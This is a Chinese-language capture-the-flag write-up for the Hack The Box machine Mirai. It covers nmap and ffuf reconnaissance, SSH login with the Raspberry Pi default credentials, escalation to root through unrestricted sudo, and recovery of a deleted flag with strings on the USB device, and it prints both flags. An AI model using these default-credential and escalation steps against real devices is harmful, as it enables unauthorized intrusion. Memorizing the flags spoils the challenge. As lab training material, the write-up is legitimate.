HTB:Mirai[WriteUP]
目录
连接至HTB服务器并启动靶机
1.What is the name of the service running on TCP port 53 on Mirai? Don't include a version number.
使用nmap对靶机TCP端口进行开放扫描
继续使用nmap对靶机开放端口进行脚本、服务信息扫描
2.What unusual HTTP header is included in the response when visiting the service on port 80?
使用curl访问靶机80端口响应头部
3.What relative path on the webserver presents the Pi-hole dashboard?
使用ffuf对靶机80端口进行路径FUZZ
使用浏览器访问/admin路径,成功进入PI-HOLE仪表盘
4.What was the default username on a Raspberry Pi device?
5.What is the default password for the pi user?
6.Submit the flag located on the pi user's desktop.
使用该凭证尝试登录靶机SSH服务
USER_FLAG:ff837707441b257a20e32199d7c8838d
7.Can the pi user run any command as root on Mirai?
查看当前用户可特权运行的命令
8.The flag-less root.txt file mentions that it's on the USB stick. What is the mountpoint for a device that is labeled as a USB stick on this host?
直接切换到ROOT用户
通过find命令查找root_flag
列出所有挂载点
9.What is the full path to the device that represents the raw USB media on Mirai?
10.When files are deleted from a drive, is the memory definitely immediately overwritten with something else?
11.Submit the flag located on the USB device.
使用strings命令查看该文件系统
ROOT_FLAG:3d3e483143ff12ec505d026fa13e020b
连接至HTB服务器并启动靶机
靶机IP:10.10.10.48
分配IP:10.10.14.12
1.What is the name of the service running on TCP port 53 on Mirai? Don't include a version number.
使用nmap对靶机TCP端口进行开放扫描
nmap -p- --min-rate=1500 -T5 -sS -Pn 10.10.10.48
继续使用nmap对靶机开放端口进行脚本、服务信息扫描
nmap -p 22,53,80,1352,32400,32469 -sCV 10.10.10.48
由扫描结果可见,靶机53端口托管dnsmasq服务
2.What unusual HTTP header is included in the response when visiting the service on port 80?
使用curl访问靶机80端口响应头部
curl -I 10.10.10.48:80┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -I 10.10.10.48:80
HTTP/1.1 404 Not Found
X-Pi-hole: A black hole for Internet advertisements.
Content-type: text/html; charset=UTF-8
Date: Tue, 05 Nov 2024 00:39:57 GMT
Server: lighttpd/1.4.35
这里响应头部出现了一个不寻常的HTTP标头:X-Pi-hole
3.What relative path on the webserver presents the Pi-hole dashboard?
使用ffuf对靶机80端口进行路径FUZZ
ffuf -u http://10.10.10.48/FUZZ -w ../dictionary/common.txt
使用浏览器访问/admin路径,成功进入PI-HOLE仪表盘
4.What was the default username on a Raspberry Pi device?
直接在网上搜索PI-HOLE相关凭证
该设备的默认用户名为:pi
5.What is the default password for the pi user?
默认密码为:raspberry
账号:pi
密码:raspberry
6.Submit the flag located on the pi user's desktop.
使用该凭证尝试登录靶机SSH服务
ssh pi@10.10.10.48
查找user_flag位置并查看其内容
pi@raspberrypi:~ $ find / -name 'user.txt' 2>/dev/null
/home/pi/Desktop/user.txtpi@raspberrypi:~ $ cat /home/pi/Desktop/user.txt
ff837707441b257a20e32199d7c8838d
USER_FLAG:ff837707441b257a20e32199d7c8838d
7.Can the pi user run any command as root on Mirai?
查看当前用户可特权运行的命令
sudo -lpi@raspberrypi:~ $ sudo -l
Matching Defaults entries for pi on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser pi may run the following commands on localhost:
(ALL : ALL) ALL
(ALL) NOPASSWD: ALL
当前用户可特权运行所有命令(yes)
8.The flag-less root.txt file mentions that it's on the USB stick. What is the mountpoint for a device that is labeled as a USB stick on this host?
直接切换到ROOT用户
sudo su通过find命令查找root_flag
root@raspberrypi:/home/pi# find / -name 'root.txt'
/lib/live/mount/persistence/sda2/root/root.txt
/root/root.txt
查看两个文件发现里面都没有FLAG
root@raspberrypi:/home/pi# cat /root/root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...
root@raspberrypi:/home/pi# cat /lib/live/mount/persistence/sda2/root/root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...
列出所有挂载点
mount
列出有usb字样的挂载点
mount | grep usbroot@raspberrypi:/home/pi# mount | grep usb
/dev/sdb on /media/usbstick type ext4 (ro,nosuid,nodev,noexec,relatime,data=ordered)
9.What is the full path to the device that represents the raw USB media on Mirai?
mount | grep usbroot@raspberrypi:/home/pi# mount | grep usb
/dev/sdb on /media/usbstick type ext4 (ro,nosuid,nodev,noexec,relatime,data=ordered)
10.When files are deleted from a drive, is the memory definitely immediately overwritten with something else?
常识题,文件被删除后并不会(no)直接被覆盖,而是在周围标记该块可写入新数据
11.Submit the flag located on the USB device.
使用strings命令查看该文件系统
strings /dev/sdbroot@raspberrypi:/home/pi# strings /dev/sdb
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
/media/usbstick
2]8^
lost+found
root.txt
damnit.txt
>r &
3d3e483143ff12ec505d026fa13e020b
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James